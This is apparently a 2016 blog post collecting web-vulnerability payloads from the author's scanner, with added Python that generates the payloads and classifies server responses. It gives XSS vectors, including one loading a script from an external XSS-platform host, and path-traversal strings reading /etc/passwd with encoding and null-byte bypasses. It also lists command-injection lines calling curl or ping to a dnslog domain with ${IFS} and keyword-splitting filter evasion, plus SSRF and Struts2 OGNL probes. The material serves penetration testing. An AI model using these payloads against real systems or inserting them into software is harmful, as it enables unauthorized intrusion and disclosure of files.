Web vulnerability testing payload collection
2016-12-14 17:51
A collection of commonly used payloads for web vulnerability testing, taken from a sqlmap-like web security testing tool I wrote, for reference when testing. In every payload below, [random] is a placeholder the tool fills with a fresh random string per request, so that a hit (a changed page title, a DNS query at the dnslog service) can be tied back to the probe that caused it.
[Reflected XSS]
[formed in HTML]
"'><script>document.title="[random]";</script>
<script>document.title="[random]";</script>
<svg onload=document.title="[random]";>
Setting document.title to the token instead of popping alert() gives the scanner something it can check: the page title after the script has run, or at minimum the unescaped string document.title="[random]" in the response body. The first payload closes a quoted attribute and the enclosing tag before opening the script tag; the third one works where script tags are stripped but SVG event handlers are not.
[formed in JS]
document.title="[random]";//
;document.title="[random]";//
";document.title="[random]";
';document.title="[random]";
");document.title="[random]";
');document.title="[random]";
The first two are for input echoed directly into script code; the others first close the string literal (a quote, or a quote plus the parenthesis of a function call) the input is embedded in. If what follows the injection point on that line is not valid JavaScript on its own, end the payload with // so the leftover is commented out, otherwise the whole script fails to parse and nothing runs.
[formed in an HTML attribute (img)]
888" onload=document.title="[random]" a="
888' onload=document.title="[random]" a='
888 onload=document.title="[random]"
The trailing a=" / a=' absorbs the original closing quote so the tag stays well-formed; the third form is for unquoted attribute values. Note that onload on an img only fires if src actually loads; for a src that cannot load (such as 888 here) onerror is the handler that fires, so use onerror unless the injected value is also a reachable image.
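The reflected-XSS probes above only become a scanner once the [random] token is generated per request and the response is checked for where the probe landed. The following is an added example of that loop, written for this page and not code from the author's tool: it substitutes the token into the three context families, then classifies each response as "script" (marker inside a script block), "event" (marker inside an on* handler), "text" (reflected verbatim but not executable), "encoded" (the quotes and brackets were escaped, so the filter held) or "absent". Two deliberate deviations from the page's payloads: the JS variants all end in // so the rest of the original statement is commented out, and the img-attribute variants use onerror, since a src of 888 never loads and onload would never fire. The fetch function passed to scan() and the sample response bodies are assumptions constructed for the example.

```python
import re
import secrets

# Reflected-XSS probe templates, grouped by the context the input is echoed into.
# Differences from the page: JS variants end in //, img-attribute variants use onerror.
TEMPLATES = {
    "html": [
        '"\'><script>document.title="[random]";</script>',
        '<script>document.title="[random]";</script>',
        '<svg onload=document.title="[random]";>',
    ],
    "js": [
        'document.title="[random]";//',
        ';document.title="[random]";//',
        '";document.title="[random]";//',
        "';document.title=\"[random]\";//",
        '");document.title="[random]";//',
        "');document.title=\"[random]\";//",
    ],
    "attr": [
        '888" onerror=document.title="[random]" a="',
        "888' onerror=document.title=\"[random]\" a='",
        '888 onerror=document.title="[random]"',
    ],
}

SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)
TAG = re.compile(r"<[a-zA-Z][^>]*>")           # one opening tag, up to its closing '>'
HANDLER = re.compile(r"\bon[a-z]+\s*=", re.I)  # any on*= event attribute inside a tag


def new_token() -> str:
    """Per-request token standing in for the page's [random] placeholder."""
    return secrets.token_hex(6)


def build_payloads(token: str) -> list:
    """Return (context, payload) pairs with [random] replaced by the token."""
    return [(ctx, t.replace("[random]", token))
            for ctx, items in TEMPLATES.items() for t in items]


def classify_reflection(body: str, token: str) -> str:
    """Decide where the probe landed in the response body."""
    marker = f'document.title="{token}"'
    if marker in body:
        if any(marker in m.group(1) for m in SCRIPT_BLOCK.finditer(body)):
            return "script"      # input reached JavaScript code
        for m in TAG.finditer(body):
            tag = m.group(0)
            if marker in tag and HANDLER.search(tag):
                return "event"   # input became (part of) an event handler
        return "text"            # reflected verbatim, but not in an executable position
    if token in body:
        return "encoded"         # token survived, the quotes/brackets did not
    return "absent"


def scan(fetch, token: str) -> list:
    """Run every payload through fetch(payload) -> response body (assumed HTTP helper)
    and keep those that landed in an executable position."""
    hits = []
    for ctx, payload in build_payloads(token):
        verdict = classify_reflection(fetch(payload), token)
        if verdict in ("script", "event"):
            hits.append((ctx, payload, verdict))
    return hits


# Constructed responses standing in for a target's replies (not captured from a real site).
SAMPLE_TOKEN = "5f3a9c0d1e2b"
SAMPLE_BODIES = {
    "raw_in_attribute": '<input value=""\'><script>document.title="5f3a9c0d1e2b";</script>">',
    "raw_in_js": '<script>var q="";document.title="5f3a9c0d1e2b";//";</script>',
    "raw_in_img": '<img src="888" onerror=document.title="5f3a9c0d1e2b" a="">',
    "escaped": '<input value="&quot;&#39;&gt;&lt;script&gt;document.title=&quot;5f3a9c0d1e2b&quot;;&lt;/script&gt;">',
    "textarea": '<textarea>document.title="5f3a9c0d1e2b";//</textarea>',
}

if __name__ == "__main__":
    for name, body in SAMPLE_BODIES.items():
        print(f"{name:18} -> {classify_reflection(body, SAMPLE_TOKEN)}")
```

The "text" verdict is worth keeping separate from "encoded": a verbatim reflection inside a textarea or a comment is not exploitable as-is, but it tells you the application does no output encoding at that sink, which usually means a different payload for that context will work.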
[Stored XSS]
[generic payloads]
In a test environment, check how the payload is rendered at the place where it is triggered.
<script>alert(/StoredXssByScriptTag/);</script>
"'><script>alert(/StoredXssByScriptTagBypass/);</script>
[Bypass via event handler]
<img src=1 onerror=alert(/StoredXssByImgTag/)>   # rich-text filters generally do not strip the img tag
[Bypass via pseudo-protocol]
<iframe src=javascript:prompt(/StoredXssByIframeTag/);></iframe>
<object data=data:text/html;base64,PHNjcmlwdD5wcm9tcHQoL1N0b3JlZFhzc0J5T2JqZWN0VGFnLyk7PC9zY3JpcHQ+></object>
[Bypass via HTML5 tags]
<svg onload=prompt(/StoredXssBySvgTag/)>
<embed src=javascript:alert(/StoredXssByEmbedTag/);>
[Bypass via JS encoding, HTML entity encoding, decimal encoding, etc.]
<embed src=javascript:alert(/StoredXssByEmbedTagAndHtmlEncode/);>
<video><source onerror=alert(String.fromCharCode(47,83,116,111,114,101,100,88,115,115,98,121,86,105,100,101,111,84,97,103,65,110,100,83,116,114,105,110,103,69,110,99,111,100,101,47))>
<script/src=data:text/j\141v\141script,\u0061%6C%65%72%74(/StoredXssbyScriptTagAndJSEncode/)></script>
Each marker names the vector that fired (StoredXssByImgTag, StoredXssBySvgTag, ...), so when a stored payload eventually executes you know which filter gap let it through. For blind testing, replace the trigger code with the script address of your XSS platform:
"><script src=http://myxss.net/xxxxxx></script>
[Static file reading]
[Basic checks]
/../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../etc/hosts
/../../../../../../../C:/Windows/system.ini   [Windows]
[Encoding / obfuscation bypass]
/././././././././././././././././././././././././../../../../../../../../etc/passwd   # ./ segments change nothing for the filesystem but defeat a check on the start of the string
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd   # URL-encoded slash
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd   # URL-encoded dots
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd   # both encoded
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd   # double-encoded slash: a filter that decodes once still sees %2F
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/hosts   # overlong UTF-8 encoding of '.', accepted only by lax decoders
Success is the file content in the response: a root:x:0:0 line for /etc/passwd, a 127.0.0.1 entry for /etc/hosts, a [drivers] section for system.ini. Use more ../ segments than you think you need; extra ones are harmless once the path has reached the root.
[Suffix bypass]
For parameters where the application appends its own extension (.jpg, .html, ...) to the value:
/../../../../../../../../../../../etc/passwd#
/../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../etc/passwd#.jpg
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../../etc/passwd#.html
/../../../../../../../../../../../etc/passwd%00.html
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#.jpg
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#.html
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.jpg
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.html
%00 relies on null-byte truncation in C-backed string handling (e.g. PHP before 5.3.4), so everything the application appends after it is ignored; # relies on the value being fetched as a URL, where the appended suffix ends up in the fragment and is never sent. The .jpg/.html forms are for code that checks the extension of the full string before opening it.
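The traversal and suffix lists above are variations of one idea applied to one path, so it helps to see them generated from the encodings rather than copied, and to see which ones get past a typical broken check and which ones a correct check stops. The block below is an added example for this page (not the author's tool): it builds the page's encoding variants for a target file, builds the suffix variants, matches a response against a constructed fingerprint of the file, and contrasts a naive literal "../" filter with a check that decodes until the string stops changing and then normalises against the document root. The document root /var/www/html and the fingerprint patterns are assumptions for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# How ".." and "/" are written in each of the page's traversal encodings.
ENCODINGS = {
    "plain":      ("..", "/"),
    "slash":      ("..", "%2F"),          # URL-encoded separator
    "dots":       ("%2e%2e", "/"),        # URL-encoded dots
    "dots_slash": ("%2e%2e", "%2f"),      # both encoded
    "double":     ("..", "%252F"),        # double-encoded separator: survives one decoding pass
    "overlong":   ("%c0%ae%c0%ae", "/"),  # overlong UTF-8 for '.', accepted only by lax decoders
}

# Constructed fingerprints of a successful read (what the file's first lines look like).
FINGERPRINTS = {
    "/etc/passwd": re.compile(r"^root:[^:]*:0:0:", re.M),
    "/etc/hosts": re.compile(r"^127\.0\.0\.1\s", re.M),
    "C:/Windows/system.ini": re.compile(r"^\[drivers\]", re.M | re.I),
}


def traversal_payloads(target: str, depth: int = 8) -> dict:
    """Build the page's traversal variants for one target file."""
    rel = target.lstrip("/")
    out = {}
    for name, (dot, sep) in ENCODINGS.items():
        path = rel if sep == "/" else rel.replace("/", sep)
        out[name] = "/" + (dot + sep) * depth + path
    # ./ segments change nothing for the filesystem but break checks on the string's start
    out["dotslash"] = "/" + "./" * depth + "../" * depth + rel
    return out


def suffix_payloads(path: str, suffixes=(".jpg", ".html")) -> list:
    """Variants for when the application appends its own extension to the value."""
    out = [path + "#", path + "%00"]
    for s in suffixes:
        out += [path + "#" + s, path + "%00" + s]
    return out


def naive_filter_allows(path: str) -> bool:
    """The kind of check the encodings are meant to get past: a literal '../' search
    on the raw parameter, before any decoding."""
    return "../" not in path


def resolves_outside(path: str, root: str = "/var/www/html") -> bool:
    """What a correct check does: decode until nothing changes, join to the document
    root, normalise, and refuse anything that left the root."""
    decoded = path
    while True:
        step = unquote(decoded)  # invalid UTF-8 such as %c0%ae becomes U+FFFD, not '.'
        if step == decoded:
            break
        decoded = step
    resolved = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    return not resolved.startswith(root.rstrip("/") + "/")


def file_disclosed(target: str, body: str) -> bool:
    """Did the response carry the target file's content?"""
    return bool(FINGERPRINTS[target].search(body))


if __name__ == "__main__":
    for name, p in traversal_payloads("/etc/passwd").items():
        print(f"{name:10} naive-filter-allows={naive_filter_allows(p)!s:5} "
              f"escapes-root={resolves_outside(p)!s:5} {p}")
```

Running it shows the point of the list: only the plain and ./-padded forms trip the naive filter, every encoded form sails through it, and the decode-then-normalise check stops all of them except the overlong one, which a strict UTF-8 decoder never turns into a dot in the first place.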
[Command execution]
[Basic checks]
;curl [random].test.dnslog.link
| curl [random].test.dnslog.link
| ping -n 2 [random].test.dnslog.link   [Windows]
| ping -c 2 [random].test.dnslog.link   [Linux]
[Filter bypass]
;curl [random].test.dnslog.link#
| curl [random].test.dnslog.link#
%20|%20curl%20[random].test.dnslog.link
%20|%20curl%20[random].test.dnslog.link#
%20|%20ping%20-n%202%20[random].test.dnslog.link
%20|%20ping%20-c%202%20[random].test.dnslog.link#
a=p;b=ing;c=c;d=2;$a$b -$c $d [random].test.dnslog.link
a=c;b=url;$a$b [random].test.dnslog.link#
${IFS}|${IFS}curl${IFS}[random].test.dnslog.link
${IFS}|${IFS}ping${IFS}-c${IFS}2${IFS}[random].test.dnslog.link
a=p;b=ing;c=c;d=2;$a$b${IFS}-$c${IFS}$d${IFS}[random].test.dnslog.link
a=c;b=url;$a$b${IFS}[random].test.dnslog.link#
These are blind, out-of-band checks: success is a DNS query for the random name arriving at the dnslog service, which works even when the command's output is never returned to you. A trailing # comments out whatever the application appends after the injected value; ${IFS} (the shell's field separator, whitespace by default) stands in for a space where spaces are stripped; the a=p;b=ing;... forms assemble the command name from variables so that ping and curl never appear literally in the request.
[SSRF]
http://[random].test.dnslog.link/
A DNS query for the random name at the dnslog service shows the server resolved the URL you supplied; to confirm the request itself was made, also watch the HTTP access log of a host you control.
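Both the command-execution and the SSRF sections above rely on the same out-of-band signal: a unique name looked up at the dnslog service. The block below is an added example for this page (not the author's tool) that shows that loop end to end: it fills the page's command payloads with a per-request token, builds the SSRF URL, and matches tokens against dnslog records. It also shows what the keyword-splitting variants actually become on the target, by handing the assignments and the $a$b${IFS}... fragment to /bin/sh with printf in place of the real command, so nothing is executed or sent. The dnslog records are constructed for the example and the log format (timestamp, queried name, source IP) is an assumption; test.dnslog.link is the page's own domain and should be replaced by a dnslog host you control.

```python
import re
import secrets
import subprocess

DNSLOG_DOMAIN = "test.dnslog.link"  # the page's domain; use your own dnslog host

# Command-injection templates from the page. The DNS lookup, not command output,
# is the success signal, so these work for fully blind injection.
COMMAND_TEMPLATES = [
    ";curl [random].[domain]",
    "| curl [random].[domain]",
    "| ping -n 2 [random].[domain]",                 # Windows
    "| ping -c 2 [random].[domain]",                 # Linux
    ";curl [random].[domain]#",                      # '#' comments out an appended suffix
    "| curl [random].[domain]#",
    "%20|%20curl%20[random].[domain]",
    "%20|%20curl%20[random].[domain]#",
    "%20|%20ping%20-n%202%20[random].[domain]",
    "%20|%20ping%20-c%202%20[random].[domain]#",
    "a=p;b=ing;c=c;d=2;$a$b -$c $d [random].[domain]",   # command name built from variables
    "a=c;b=url;$a$b [random].[domain]#",
    "${IFS}|${IFS}curl${IFS}[random].[domain]",          # ${IFS} in place of filtered spaces
    "${IFS}|${IFS}ping${IFS}-c${IFS}2${IFS}[random].[domain]",
    "a=p;b=ing;c=c;d=2;$a$b${IFS}-$c${IFS}$d${IFS}[random].[domain]",
    "a=c;b=url;$a$b${IFS}[random].[domain]#",
]


def new_token() -> str:
    """Per-request token standing in for the page's [random] placeholder."""
    return secrets.token_hex(6)


def command_payloads(token: str, domain: str = DNSLOG_DOMAIN) -> list:
    return [t.replace("[random]", token).replace("[domain]", domain) for t in COMMAND_TEMPLATES]


def ssrf_payload(token: str, domain: str = DNSLOG_DOMAIN) -> str:
    return f"http://{token}.{domain}/"


def shell_words(assignments: str, fragment: str) -> list:
    """Show what the target's /bin/sh would run for a keyword-splitting payload: apply the
    assignments, then let the shell expand and word-split the fragment. printf stands in
    for the command, so the words are printed one per line rather than executed."""
    script = f"{assignments}; printf '%s\\n' {fragment}"
    out = subprocess.run(["sh", "-c", script], capture_output=True, text=True, check=True)
    return out.stdout.splitlines()


# Constructed dnslog records (timestamp, queried name, source IP); not from a real service.
SAMPLE_DNSLOG = """\
2016-12-14 17:51:02 a1b2c3d4e5f6.test.dnslog.link 203.0.113.5
2016-12-14 17:51:02 a1b2c3d4e5f6.test.dnslog.link 203.0.113.5
2016-12-14 17:51:09 www.example.com 198.51.100.7
"""

RECORD = re.compile(r"^\S+ \S+ (?P<name>\S+) (?P<src>\S+)$", re.M)


def oob_hits(log: str, tokens, domain: str = DNSLOG_DOMAIN) -> dict:
    """Map each token whose name was looked up to the resolver IP that asked for it."""
    wanted = {f"{t}.{domain}".lower(): t for t in tokens}
    hits = {}
    for m in RECORD.finditer(log):
        name = m.group("name").lower().rstrip(".")
        if name in wanted and wanted[name] not in hits:
            hits[wanted[name]] = m.group("src")
    return hits


if __name__ == "__main__":
    print(shell_words("a=p;b=ing;c=c;d=2", "$a$b${IFS}-$c${IFS}$d"))
    print(oob_hits(SAMPLE_DNSLOG, ["a1b2c3d4e5f6", "ffffffffffff"]))
```

Because each token is unique per request, one dnslog can serve many probes at once and a hit still identifies the exact payload (and parameter) that fired; the source IP in the record is the target's resolver, not necessarily the target itself, which is why an HTTP hit on a host you control is the stronger SSRF confirmation.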
[Struts2 command execution]
?redirect:http://[random].test.dnslog.link/%25{3*4}
%25 decodes to a literal %, so the parameter the framework sees is redirect:http://[random].test.dnslog.link/%{3*4}. On a vulnerable version the OGNL expression is evaluated, and both the redirect Location header and the DNS lookup at the dnslog service carry 12 where %{3*4} was.